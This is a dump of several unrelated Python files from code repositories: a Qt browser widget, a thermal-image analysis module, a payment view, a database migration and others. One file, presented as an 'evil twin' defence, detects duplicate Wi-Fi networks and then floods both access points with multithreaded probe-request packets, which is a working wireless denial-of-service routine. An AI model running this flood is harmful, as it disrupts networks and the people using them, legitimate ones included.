self.webview.page().triggerAction(QWebEnginePage.Forward))\r\n topLayout.addWidget(button)\r\n # url entry\r\n self.addressBar = QLineEdit()\r\n self.addressBar.setClearButtonEnabled(True)\r\n self.addressBar.setToolTip(config.thisTranslation[\"enter_fullURL\"])\r\n self.addressBar.returnPressed.connect(self.addressEntered)\r\n topLayout.addWidget(self.addressBar)\r\n # highlight button\r\n icon = \"material/image/auto_fix_off/materialiconsoutlined/48dp/2x/outline_auto_fix_off_black_48dp.png\"\r\n self.highlightButton = config.mainWindow.getIconPushButton(icon)\r\n self.highlightButton.setToolTip(config.thisTranslation[\"instantHighlight\"])\r\n self.highlightButton.clicked.connect(self.toggleInstantHighlight)\r\n topLayout.addWidget(self.highlightButton)\r\n # reload button\r\n icon = \"material/navigation/refresh/materialiconsoutlined/48dp/2x/outline_refresh_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"menu_reload\"])\r\n button.clicked.connect(lambda: self.webview.page().triggerAction(QWebEnginePage.Reload))\r\n topLayout.addWidget(button)\r\n # open in web browser button\r\n icon = \"material/action/open_in_new/materialiconsoutlined/48dp/2x/outline_open_in_new_black_48dp.png\"\r\n button = config.mainWindow.getIconPushButton(icon)\r\n button.setToolTip(config.thisTranslation[\"browser\"])\r\n button.clicked.connect(lambda: webbrowser.open(self.addressBar.text()))\r\n topLayout.addWidget(button)\r\n\r\n # find entry\r\n self.findBar = QLineEdit()\r\n self.findBar.setClearButtonEnabled(True)\r\n self.findBar.setToolTip(config.thisTranslation[\"menu5_searchItems\"])\r\n self.findBar.textChanged.connect(lambda: self.highlightContent(True))\r\n self.findBar.returnPressed.connect(lambda: self.highlightContent(True))\r\n secondLayout.addWidget(self.findBar)\r\n\r\n # go back button\r\n icon = \"material/image/navigate_before/materialiconsoutlined/48dp/2x/outline_navigate_before_black_48dp.png\"\r\n self.findButtonBackward = config.mainWindow.getIconPushButton(icon)\r\n self.findButtonBackward.setToolTip(config.thisTranslation[\"youtube_back\"])\r\n self.findButtonBackward.clicked.connect(lambda: self.highlightContent(False))\r\n secondLayout.addWidget(self.findButtonBackward)\r\n # go forward button\r\n icon = \"material/image/navigate_next/materialiconsoutlined/48dp/2x/outline_navigate_next_black_48dp.png\"\r\n self.findButtonForward = config.mainWindow.getIconPushButton(icon)\r\n self.findButtonForward.setToolTip(config.thisTranslation[\"youtube_forward\"])\r\n self.findButtonForward.clicked.connect(lambda: self.highlightContent(True))\r\n secondLayout.addWidget(self.findButtonForward)\r\n\r\n self.toggleInstantHighlight()\r\n\r\n # profile, webpage, and webview\r\n # set up a non-off-the-record profile that supports cookies\r\n profile = QWebEngineProfile(self.profileName, self)\r\n profile.setHttpCacheType(QWebEngineProfile.DiskHttpCache)\r\n profile.setPersistentCookiesPolicy(QWebEngineProfile.ForcePersistentCookies)\r\n storagePath = os.path.join(os.getcwd(), \"webstorage\")\r\n profile.setCachePath(os.path.join(storagePath, \"Cache\"))\r\n profile.setPersistentStoragePath(os.path.join(storagePath, \"PersistentStorage\"))\r\n homeDownloads = os.path.join(os.path.expanduser(\"~\"), \"Downloads\")\r\n homeDownload = os.path.join(os.path.expanduser(\"~\"), \"Download\")\r\n # set download path and handler of download request\r\n if os.path.isdir(homeDownloads):\r\n self.downloadPath = homeDownloads\r\n elif os.path.isdir(homeDownload):\r\n self.downloadPath = homeDownload\r\n else:\r\n self.downloadPath = os.path.join(storagePath, \"Downloads\")\r\n profile.setDownloadPath(self.downloadPath)\r\n profile.downloadRequested.connect(self.downloadRequested)\r\n # set up web engine page\r\n webpage = QWebEnginePage(profile, self)\r\n if config.qtLibrary == \"pyside6\":\r\n webpage.newWindowRequested.connect(self.newWindowRequested)\r\n else:\r\n webpage.createWindow = self.createWindow\r\n # set up webview\r\n self.webview = QWebEngineView()\r\n self.webview.setPage(webpage)\r\n # Alternately, construct a QWebEngineView with a QWebEnginePage directly in PySide6\r\n #self.webview = QWebEngineView(webpage)\r\n self.webview.urlChanged.connect(lambda url: self.addressBar.setText(url.toString()))\r\n self.webview.loadFinished.connect(self.loadFinished)\r\n mainLayout.addWidget(self.webview)\r\n\r\n def toggleInstantHighlight(self):\r\n def getInstantHighlightDisplay():\r\n if self.enableInstantHighlight:\r\n return config.mainWindow.getCrossplatformPath(\"material/image/auto_fix_normal/materialiconsoutlined/48dp/2x/outline_auto_fix_normal_black_48dp.png\")\r\n else:\r\n return config.mainWindow.getCrossplatformPath(\"material/image/auto_fix_off/materialiconsoutlined/48dp/2x/outline_auto_fix_off_black_48dp.png\")\r\n self.findBar.setVisible(self.enableInstantHighlight)\r\n self.findButtonBackward.setVisible(self.enableInstantHighlight)\r\n self.findButtonForward.setVisible(self.enableInstantHighlight)\r\n self.highlightButton.setStyleSheet(config.mainWindow.getQIcon(getInstantHighlightDisplay()))\r\n self.enableInstantHighlight = not self.enableInstantHighlight\r\n\r\n def highlightContent(self, forward):\r\n searchString = self.findBar.text().strip()\r\n if forward:\r\n self.webview.findText(searchString)\r\n else:\r\n self.webview.findText(searchString, QWebEnginePage.FindBackward)\r\n\r\n def downloadRequested(self, request):\r\n def isFinishedChanged(obj=None):\r\n if request.isFinished():\r\n os.system(f\"{config.open} {self.downloadPath}\")\r\n request.isFinishedChanged.connect(isFinishedChanged)\r\n request.accept()\r\n\r\n # work in PySide2 or PyQt5, but not in PySide6\r\n def createWindow(self, windowType):\r\n if windowType in (QWebEnginePage.WebBrowserWindow, QWebEnginePage.WebBrowserTab):\r\n newWindow = SimpleBrowser(config.mainWindow, \"New\", self.profileName)\r\n newWindow.show()\r\n return newWindow.webview.page()\r\n\r\n # work in PySide6, but not in PySide2 or PyQt5\r\n def newWindowRequested(self, request):\r\n newWindow = SimpleBrowser(config.mainWindow, \"New\", self.profileName)\r\n newWindow.setUrl(QUrl(request.requestedUrl()))\r\n newWindow.show()\r\n\r\n def setUrl(self, url):\r\n urlString = url.toString()\r\n if self.home is None:\r\n # set home link when the first link is opened\r\n self.home = url\r\n if url.isValid() and NetworkUtil.is_valid_url(urlString):\r\n #self.webview.setUrl(url)\r\n self.urlString = urlString\r\n self.webview.load(url)\r\n else:\r\n self.searchGoogle()\r\n\r\n def loadFinished(self, ok):\r\n if not ok and not self.urlString == self.home.toString() and not self.urlString.startswith(\"https://www.google.com/\"):\r\n self.searchGoogle()\r\n\r\n def searchGoogle(self):\r\n #if NetworkUtil.check_internet_connection():\r\n address = self.addressBar.text().strip()\r\n query = re.sub(\"^https://(.*?)[/]*$\", r\"\\1\", address)\r\n if not address == query:\r\n self.addressBar.setText(query)\r\n # search\r\n query = TextUtil.plainTextToUrl(query)\r\n url = QUrl(f\"https://www.google.com/search?q={query}\")\r\n self.webview.load(url)\r\n\r\n def addressEntered(self):\r\n address = self.addressBar.text()\r\n if address:\r\n if not \"://\" in address:\r\n address = f\"https://{address}\"\r\n self.setUrl(QUrl(address))\r\n","repo_name":"eliranwong/UniqueBible","sub_path":"gui/SimpleBrowser.py","file_name":"SimpleBrowser.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"4913154509","text":"tC = int(input())\nfor t in range(tC):\n n,k = [int(i) for i in input().split()]\n dogs = set()\n diffs = []\n for j in range(n):\n dogs.add(int(input()))\n\n dogs = sorted(list(dogs))\n for j in range(len(dogs)-1):\n diffs.append(dogs[j+1] - dogs[j])\n\n diffs = sorted(diffs)\n dogs = list(dogs)\n if k == 1:\n print(dogs[-1] - dogs[0])\n else:\n print(sum(diffs[:len(dogs)-k]))","repo_name":"kxu9gh/IEEE-Xtreme","sub_path":"dog2.py","file_name":"dog2.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10148682638","text":"import time\n\nfrom scapy.all import *\nimport os\nimport threading\nimport multiprocessing\n\nfrom scapy.layers.dot11 import Dot11Beacon, Dot11, RadioTap, Dot11Deauth, Dot11ProbeReq, Dot11Elt\n\n\"\"\"\ndefence module against evil twin, scan for duplicate networks and disconnect from them if found.\n\"\"\"\n\nnetwork_dict = {}\n# my_macs = [get_if_hwaddr(i) for i in get_if_list()]\nmy_macs = []\nduplicate_aps = {}\nunique_ap_names = {}\ninterface = ''\n\n\ndef sniffAP(packet):\n if packet.haslayer(Dot11Beacon):\n mac_addr = packet[Dot11].addr2\n ap_name = packet[Dot11].info.decode()\n stats = packet[Dot11Beacon].network_stats()\n channel = stats.get(\"channel\")\n if mac_addr not in network_dict.keys() and mac_addr not in my_macs:\n network_dict[mac_addr] = (mac_addr, ap_name, channel)\n print(f\"Found AP:{network_dict[mac_addr]}\")\n\n\n# traverse the networks we found, and look if two of them have the same name.\ndef find_duplicates():\n for mac_addr in network_dict:\n ap_name = network_dict[mac_addr][1]\n if ap_name in unique_ap_names.keys():\n print(f\"Duplicated network:\\nMAC:{mac_addr} | Name: {ap_name}\")\n duplicate_aps[\n mac_addr] = ap_name # insert both mac addresses into networks, since we don't know which is fake.\n # this is a mac address\n duplicate_aps[unique_ap_names[ap_name]] = ap_name\n else:\n unique_ap_names[ap_name] = mac_addr\n print(duplicate_aps)\n\n\ndef changeChannels(timeout):\n channel = 1\n counter = 0\n while True:\n # os command to switch channels.\n os.system(f\"iwconfig {interface} channel {channel}\")\n channel = channel % 14 + 1\n time.sleep(2)\n print(f\"scanning channel: {channel}\")\n counter += 1\n if counter == timeout:\n break\n\n\ndef setMonitor(interface):\n os.system(f\"sudo ifconfig {interface} down\")\n os.system(f\"sudo iwconfig {interface} mode monitor\")\n os.system(f\"sudo ifconfig {interface} up\")\n\n\ndef ddos(victim, iface):\n def disconnect():\n random_mac = RandMAC()\n ddos_pkt = RadioTap() / Dot11(addr1=victim, addr2=random_mac,\n addr3=random_mac) / Dot11ProbeReq() / Dot11Elt(ID=\"SSID\", info=\"\")\n # sendp since we are working on layer 2\n sendp(ddos_pkt, iface=iface, loop=1)\n\n keep_alive = []\n try:\n for i in range(0, 10000):\n thread = threading.Thread(target=disconnect)\n thread.start()\n keep_alive.append(thread)\n except:\n pass\n\n\ndef defend(iface):\n global interface\n interface = iface\n setMonitor(interface)\n timeout = 60\n\n # ------- PART 1: SCAN FOR DUP NETWORKS ---------\n channel_changer = multiprocessing.Process(target=changeChannels, args=(timeout,), daemon=True)\n channel_changer.start()\n sniff(prn=sniffAP, timeout=timeout, iface=interface)\n channel_changer.join()\n # ---------------------------------------------------\n # ------ PART 2: Attack attacker :) -------\n find_duplicates()\n if len(duplicate_aps.keys()) > 0:\n print(\"Found duplicate APs - attacking both APs \")\n for dup_mac in duplicate_aps.keys():\n dc_process = multiprocessing.Process(target=ddos, args=(dup_mac, interface),\n daemon=True) # start the ddos thread\n dc_process.start()\n","repo_name":"ShmuelLa/Evil-Twin","sub_path":"defence_v3.py","file_name":"defence_v3.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28087727845","text":"import pyttsx3\nimport speech_recognition as sr\nfrom playsound import playsound\n\n\nclass Speak_Listen:\n def __init__(self):\n self.speech_engine = pyttsx3.init()\n self.speech_engine.setProperty(\"rate\", 150)\n\n self.r = sr.Recognizer()\n self.mic = sr.Microphone(device_index=2)\n\n def say(self, text):\n \"\"\"Uses pyttsx3 engine text-to-speech to to say 'text' argument\"\"\"\n # self.speech_engine.connect('finished-utterance', self.stop_speaking)\n print(text)\n self.speech_engine.say(text, \"speech\")\n self.speech_engine.runAndWait()\n \n def stop_speaking(self, name, completed):\n self.speech_engine.endLoop()\n\n def listen(self):\n \"\"\"Uses speech_recognition library to listen to get audio input and understand what the user is saying\"\"\"\n \n with self.mic as source:\n print(\"Listening\")\n self.r.non_speaking_duration = 0.5\n audio = self.r.listen(source, timeout=7, phrase_time_limit=5)\n \n return (self.r.recognize_google(audio))\n\nspeak_listen = Speak_Listen()","repo_name":"reybahl/Assistant","sub_path":"assistant_functions/speak_listen.py","file_name":"speak_listen.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"36506593878","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Fixed constraint name.\n\nRevision ID: 54cc17accf2c\nRevises: 4fa888fd7eda\nCreate Date: 2015-05-28 16:44:32.936076\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '54cc17accf2c'\ndown_revision = '4fa888fd7eda'\n\nfrom alembic import op # noqa: E402\nimport sqlalchemy as sa # noqa: E402\n\n\ndef create_table(is_old=False):\n if is_old:\n constraints = ['uniq_field_mapping', 'uniq_service_mapping']\n else:\n constraints = ['uniq_field_threshold', 'uniq_service_threshold']\n table = op.create_table(\n 'tmig_hashmap_thresholds',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('threshold_id', sa.String(length=36), nullable=False),\n sa.Column('level', sa.Numeric(precision=20, scale=8), nullable=True),\n sa.Column('cost', sa.Numeric(precision=20, scale=8), nullable=False),\n sa.Column(\n 'map_type',\n sa.Enum('flat', 'rate', name='enum_map_type',\n create_constraint=True), nullable=False),\n sa.Column('service_id', sa.Integer(), nullable=True),\n sa.Column('field_id', sa.Integer(), nullable=True),\n sa.Column('group_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(\n ['field_id'],\n ['hashmap_fields.id'],\n ondelete='CASCADE'),\n sa.ForeignKeyConstraint(\n ['group_id'],\n ['hashmap_groups.id'],\n ondelete='SET NULL'),\n sa.ForeignKeyConstraint(\n ['service_id'],\n ['hashmap_services.id'],\n ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('threshold_id'),\n sa.UniqueConstraint('level', 'field_id', name=constraints[0]),\n sa.UniqueConstraint('level', 'service_id', name=constraints[1]))\n return table\n\n\ndef upgrade():\n dialect = op.get_context().dialect.name\n try:\n # Needs sqlalchemy 0.8\n if dialect != 'postgresql':\n with op.batch_alter_table('hashmap_thresholds') as batch_op:\n batch_op.drop_constraint(\n 'uniq_field_mapping',\n type_='unique')\n batch_op.drop_constraint(\n 'uniq_service_mapping',\n type_='unique')\n batch_op.create_unique_constraint(\n 'uniq_field_threshold',\n ['level', 'field_id'])\n batch_op.create_unique_constraint(\n 'uniq_service_threshold',\n ['level', 'service_id'])\n except AttributeError:\n # No support for batch operations\n if dialect == 'sqlite':\n new_table = create_table()\n sel = sa.sql.expression.select(new_table.columns.keys())\n op.execute(\n new_table.insert().from_select(\n new_table.columns.keys(),\n sel.select_from('hashmap_thresholds')))\n op.drop_table('hashmap_thresholds')\n op.rename_table('tmig_hashmap_thresholds', 'hashmap_thresholds')\n else:\n op.drop_constraint(\n 'uniq_field_mapping',\n 'hashmap_thresholds',\n type_='unique')\n op.drop_constraint(\n 'uniq_service_mapping',\n 'hashmap_thresholds',\n type_='unique')\n op.create_unique_constraint(\n 'uniq_field_threshold',\n 'hashmap_thresholds',\n ['level', 'field_id'])\n op.create_unique_constraint(\n 'uniq_service_threshold',\n 'hashmap_thresholds',\n ['level', 'service_id'])\n","repo_name":"openstack/cloudkitty","sub_path":"cloudkitty/rating/hash/db/sqlalchemy/alembic/versions/54cc17accf2c_fixed_constraint_name.py","file_name":"54cc17accf2c_fixed_constraint_name.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"53"} +{"seq_id":"26712946747","text":"from utilities.models import PendingPayments\nfrom utilities.payments.payment_probe import Utility\nfrom rest_framework import viewsets, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n# from swiftpay_backend.history.transactionhistory_utils import TransactionHistoryUtils\nfrom dotenv import load_dotenv\nfrom ..services.cableservice import CableSubscriptionService\nfrom .helpers import getnumberfromstring\nimport os, uuid\nload_dotenv()\nops = os.getenv(\"OPS\")\nusername = os.getenv(\"API_USERNAME\")\napi_password = os.getenv(\"API_PASSWORD\")\n\nclass CableTvSubscription(APIView):\n \n def process_data_vending(self,data):\n self.cablesubscriptionservice = CableSubscriptionService()\n response = self.cablesubscriptionservice.cableRoutine(data)\n \n if response['code']=='success' :\n # Overide request data with response data\n data['amount'] = str(float(getnumberfromstring(response['data']['amount_charged'])[0]))\n data['phonenumber'] = response['data']['phone']\n data['provider'] = data['provider'] #response['data']['cable_tv'] uncomment for live testing\n data['recipient'] = response['data']['smartcard_number']\n data['bouquet'] = data['servicename'] #\n \n data['status'] = response['code']\n # self.transactionhistoryutils = TransactionHistoryUtils(None,None,None,data,'cable')\n return Response({\"status\": True, \"data\": response['message']}, status=status.HTTP_200_OK)\n else:\n data['status'] = response['code']\n # self.transactionhistoryutils = TransactionHistoryUtils(None,None,None,data,'data')\n return Response({\"status\": False, \"message\": response['message']})\n \n def confirm_payment(self,data):\n self.utility = Utility()\n return self.utility.verifyWithPaystack(data['transaction']['reference'])\n \n def post(self, request):\n try:\n data=request.data\n # data['paid'] = False\n # data['transaction']['reference'] = 'XXXXXXXXXXXXXXXXXXXX'\n if data.get('paid'):\n return self.process_data_vending(data)\n else:\n if not self.confirm_payment(data):\n new_data = {}\n new_data['_type'] = 'cable'\n new_data['order_ref'] = 'OC-'+ str(uuid.uuid4())\n new_data['phone'] = data['phonenumber']\n new_data['service_request'] = data\n PendingPayments.objects.create(**new_data)\n return Response({\"status\": False, \"message\": \"Your payments is pending, please do not retry this transaction!\", 'data':new_data['order_ref']}, status=status.HTTP_202_ACCEPTED)\n else:\n return self.process_data_vending(data)\n \n except Exception as e:\n return Response({\"status\": False, \"data\": str(e)})\n \n \n","repo_name":"Pybool/Quickee","sub_path":"escrow-backend/utilities/views/cablesubscription_view.py","file_name":"cablesubscription_view.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10810619012","text":"##############################################################\n# #\n# Project: Design of real-time processing algorithms for #\n# biomedical images to be implemented in the #\n# Raspberry Pi platform #\n# Author: Rubén Padial Allué #\n# mail: rubpadall@alum.us.es #\n# Admisor: Juan Antonio Leñero Bardallo #\n# Date: 07-09-2020 #\n##############################################################\n\nimport struct\nimport numpy as np\nimport math\nimport scipy \nimport matplotlib.pyplot as plt\n\nfrom skimage import data\nfrom skimage import filters\nfrom skimage import exposure\nfrom skimage import measure\n##########################################################################################\n# DEFINES #\n##########################################################################################\n# Sobel-Feldman operator\nK = np.array([ [47, 0, -47],\n [162, 0, -162], \n [47, 0, -47]\n ])\n\n# \nu = np.array([1, 2, 1])\n\n'''\nT2=36.8\nT1=36.6\n\nR1=8250\nR2=8300\n\n'''\nT2=37.1;\nT1=36.0;\n\nR1=8250;\nR2=8400;\n\nM=80\nN=60\n##########################################################################################\n# END DEFINES #\n##########################################################################################\n\n##########################################################################################\n# OpenFile: Open 'finput' .bin file packaged and return a list 'L'. Data packaged is \n# unsigned-sorts little-endian.\n# Parameters:\n# - finput: input file.\n# Return:\n# - L: List with with the filedata.\n##########################################################################################\n\ndef OpenFile(finput):\n #reading unsigned shorts 'tuple'??\n with open(finput, \"rb\") as fid:\n #Max = struct.unpack('H', fid.read(2)) # 0:\n G[i,j]=G[i,j]/MaxVal#*(MaxVar/MaxVal)\n else:\n G[i,j]=-G[i,j]/MinVal#*(MaxVar/MinVal)\n\n return G\n\n##########################################################################################\n#SOBELKERNEL returns sobel kernel\n# KERNEL=SOBELKERNEL(SIZE) Returns Sobel filter of predefined size.\n#\n# KERNEL=SOBELKERNEL(SIZE, 'NORMALISED') The Sobel matrix should be\n# normalised if proper derivative estimator is required.\n#\n# [KERNEL, S, D]=SOBELKERNEL(SIZE, 'NORMALISED') Returns also smoothing S\n# and derivative D components individually. The kernel is then a\n# multiplication of these two vectors: S'*D. This can be usefull for\n# convolution acceleration via separable kernels as illustrated at:\n# http://blogs.mathworks.com/steve/2006/10/04/separable-convolution/\n# \n# Example\n# -------\n# sobelkernel(4)\n#\n# See also IMFILTER, FSPECIAL.\n# Contributed by Jan Motl (jan@motl.us)\n# $Revision: 1.1 $ $Date: 2013/02/13 16:58:01 $\n# For method description see:\n# http://stackoverflow.com/questions/9567882/sobel-filter-kernel-of-large-size\n# Parameter checking.\n##########################################################################################\ndef sobelkernel(size, varargin=[]):\n # Parameter checking.\n if (len(varargin)!=0) and (varargin == 'normalise'):\n normalisation = 1/8\n else:\n normalisation = 1\n \n # The dafault 3x3 Sobel kernel.\n s = normalisation * u;\n d = np.array([1, 0, -1])\n\n # Convolve the default 3x3 kernel to the desired size.\n for i in range(0, size-3):\n s = normalisation * np.convolve(u, s,)\n d = np.convolve(u, d)\n #kernel = np.dot(x,d);\n \n kernel = np.zeros((s.shape[0],d.shape[0]))\n\n for i in range(0, s.shape[0]):\n for j in range(0, d.shape[0]):\n kernel[i,j]=s[i]*d[j]\n \n return kernel\n\n##########################################################################################\n# Otsu: Otsu method for image segmentation\n# Parameters:\n# - IM: orginal image\n# - thr: threshold 'lower'/'upper' remove value below/upper the threshold.\n# Return:\n# - IMOtsu: Image segmented. \n##########################################################################################\ndef Otsu (IM, thr=\"lower\"): \n val = filters.threshold_otsu(IM)\n #hist, bins_center = exposure.histogram(IM)\n N = IM.shape[0] # number of rows\n M = IM.shape[1] # number of columns\n \n #IMOtsu = IM\n IMOtsu = IM.copy()\n MinVal = math.floor(np.amin(IM))\n MaxVal = math.ceil(np.amax(IM))\n \n if (thr == \"lower\"): \n for i in range(0,N):\n for j in range(0,M):\n if (IMOtsu[i,j]val):\n IMOtsu[i,j]=MinVal\n \n \n return IMOtsu\n \n'''\ndef StartIsocurve(x, y, Tittle, ColorMap):\n #global app, win2, vb\n cmap = plt.get_cmap(ColorMap)\n ## Always start by initializing Qt (only once per application)\n app = pg.mkQApp()\n #win = QtGui.QMainWindow()\n # container widget with a layout to add QWidgets to\n\n # win.show()\n ####\n win2 = pg.GraphicsWindow()\n win2.setWindowTitle(Tittle)\n vb = win2.addViewBox()\n win2.resize(x,y)\n return vb'''\n\n##########################################################################################\n# CoordinateMethods: Area calculation with cordinatemethos\n# Parameters:\n# - xi: array with x coordinates of a isocurve\n# - yi: array with y coordinates of a isocurve\n# Return:\n# - Area: area behind the curve. \n##########################################################################################\ndef CoordinateMethods(xi, yi):\n S1 = xi[1]*yi[1+1]\n S2 = xi[1+1]*yi[1]\n for i in range (0, xi.shape[0]-1):\n S1 = S1 + xi[i]*yi[i+1]\n S2 = S2 + xi[i+1]*yi[i]\n\n Area = abs(S1-S2)/2\n\n return Area\n\n##########################################################################################\n# SiftingArea: Select the array with the maximum number of elements. Filter the greatest \n# area\n# Parameters:\n# - Arrays: Array with coodinates\n# Return:\n# - max_index: index of the larger array.\n##########################################################################################\ndef SiftingArea(Arrays):\n size_Arrays = np.shape(Arrays)\n #print('shape = ', size_Arrays[0])\n n_Arrays = np.zeros(size_Arrays[0])\n\n for i in range(size_Arrays[0]):\n Array_x = Arrays[i]\n n_Arrays [i] = Array_x.shape[0]\n \n max_index = np.where(n_Arrays==(np.max(n_Arrays)))\n max_index = (np.asarray(max_index[0]))\n np.reshape(max_index,max_index.shape[0],'C')\n return int(max_index)\n\n##########################################################################################\n# ReqArea: Calculate the area behind a temperature line. \n# Parameters:\n# - IM: Temperetature image array. \n# - level: Number of levels to be plotted. \n# - AreaType: Default Value = 'sum'.\n# -- 'sum' caculates de sum of all the areas.\n# -- 'greater' calculates the area of the grater region. \n# Return:\n# - Area: Number of pixels with level temperature or greater. \n##########################################################################################\ndef ReqArea(IM, level, AreaType='sum'):\n Area = 0\n if (level < np.amin(IM) or level > np.amax(IM)):\n return 0\n else:\n ContourCordinates = measure.find_contours(IM, level) #Retunrs (row, column) array\n #↨ContourCordinates = ContourCordinates[(SiftingArea(ContourCordinates))]\n size_contour = np.shape(ContourCordinates)\n CC = np.zeros(size_contour[0])\n\n if (AreaType == \"sum\"):\n for i in range(size_contour[0]):\n A = ContourCordinates[i]\n\n Area = Area + CoordinateMethods(A[:,1], A[:,0]) # xi = column, yi =row\n elif (AreaType == \"greater\"):\n SiftingArea(ContourCordinates)\n A = ContourCordinates[SiftingArea(ContourCordinates)]\n Area = CoordinateMethods(A[:,1], A[:,0])\n \n return Area\n\n##########################################################################################\n# PlotIsocurve: Plots nlevels isocurves from min to max value. \n# Parameters:\n# - IM: Temperetature image array. \n# - nlevels: Number of levels to be plotted. \n# - ShowImage: 'Tue' plots grey image below isocurves. Default Value = 'False\".\n# Return:\n# - Nothing\n##########################################################################################\ndef PlotIsocurve(IM, nlevels, ShowImage = 'False'):\n global fig\n\n fig = plt.figure(\"Isoterm\")\n ax = fig.add_subplot(111)\n\n\n if ShowImage == 'True':\n ax.imshow(IM, cmap='Greys')\n\n cont = plt.subplot()\n cs = cont.contour(IM, nlevels, origin='lower')\n ax.clabel(cs)\n\n plt.show()\n\n##########################################################################################\n# CloseIsocurves: Close isocurves figure.\n# Parameters:\n# - Fig: Figure ID. \n# Return:\n# - Nothing\n##########################################################################################\ndef CloseIsocurves(Fig): \n plt.close(Fig)\n\n##########################################################################################\n# PlotRegion: Plots contour line.\n# Parameters:\n# - IM: Temperature image array.\n# - level: Temperature to be plotted. \n# - ShowImage: Default value = 'False'.\n# - AreaType: DefaultValue 'sum'\n# -- \"sum\" all the areas. \n# -- \"greater\" grater region. \n# Return:\n# - Nothing\n##########################################################################################\ndef PlotRegion(IM, level, ShowImage = 'False', AreaType='sum'):\n global figure\n contours = measure.find_contours(IM, level)\n # Display the image and plot all contours found\n figure, ax = plt.subplots()\n if ShowImage == 'True':\n ax.imshow(IM, cmap=plt.cm.gray)\n\n\n if (AreaType==\"sum\"):\n for n, contour in enumerate(contours):\n ax.plot(contour[:, 1], contour[:, 0], linewidth=2)\n elif (AreaType==\"greater\"):\n contours = contours[(SiftingArea(contours))]\n ax.plot(contours[:, 1], contours[:, 0], linewidth=2) \n\n ax.axis('image')\n ax.set_xticks([])\n ax.set_yticks([])\n plt.show()\n","repo_name":"RPadial/SCC","sub_path":"SCC.py","file_name":"SCC.py","file_ext":"py","file_size_in_byte":17443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74031884327","text":"\"\"\"\n5. Longest Palindromic Substring\n\nGiven a string s, find the longest palindromic substring in s. You may assume that the maximum length of s is 1000.\n\nExample 1:\n\nInput: \"babad\"\nOutput: \"bab\"\nNote: \"aba\" is also a valid answer.\nExample 2:\n\nInput: \"cbbd\"\nOutput: \"bb\"\n\"\"\"\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n start, end = 0, 0\n for i in range(len(s)):\n cur_len = max(self.expand(s, i, i), self.expand(s, i, i + 1))\n if cur_len > end - start:\n start = i - (cur_len - 1) // 2 # remember to -1 since it could expand at center of two char\n end = i + cur_len // 2\n return s[start:end + 1]\n\n def expand(self, s, left, right):\n l, r = left, right\n while l >= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n return r - l - 1\n","repo_name":"chauncyf/leetcode","sub_path":"Python/longest_palindromic_substring.py","file_name":"longest_palindromic_substring.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16631044634","text":"import datetime\nimport os\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom sys import platform\n\n# number of epochs: how many times do you want\n# to pass the same batch size to train\n# total batch size = total train prediction size\nCHECKPOINT_PATH = 'training/model_{accuracy}.hdf5'\nCHECKPOINT_DIR = os.path.dirname(CHECKPOINT_PATH)\nMODEL_WEIGHT_FILENAME = 'christopher_model.hdf5'\n\n\ndef visualise_history(history):\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n\n # Retrieve a list of list results on training and validation prediction\n # sets for each training epoch\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n # Get number of epochs\n epochs = range(len(acc))\n\n # Plot training and validation accuracy per epoch\n plt.plot(epochs, acc)\n plt.plot(epochs, val_acc)\n plt.title('Training and validation accuracy')\n\n plt.figure()\n\n # Plot training and validation loss per epoch\n plt.plot(epochs, loss)\n plt.plot(epochs, val_loss)\n plt.title('Training and validation loss')\n plt.show()\n\n\nclass ModelTrainer:\n def __init__(self,\n train_data_gen,\n steps_per_epoch,\n epochs,\n validation_gen,\n validation_steps,\n model):\n self.train_data_gen = train_data_gen\n self.steps_per_epoch = steps_per_epoch\n self.epochs = epochs\n self.validation_gen = validation_gen\n self.validation_steps = validation_steps\n self.model = model\n\n def load_model_weights(self):\n self.model = tf.keras.model.load_model(MODEL_WEIGHT_FILENAME)\n print('model successfully loaded!')\n self.model.summary()\n\n def train_model(self):\n cp_callback = tf.keras.callbacks.ModelCheckpoint(CHECKPOINT_PATH,\n save_best_only=True)\n if not (os.path.isdir('./logs')):\n os.mkdir('./logs')\n\n # Checking OS for TensorBoard compatibility\n if platform == \"darwin\":\n print('os: OSX detected..')\n if not os.path.isdir('./logs/osx'):\n os.mkdir('./logs/osx')\n tb_log = 'logs/osx'\n elif platform == 'win32':\n print('os: Windows detected..')\n tb_log = \"logs\\\\fit\\\\\" + 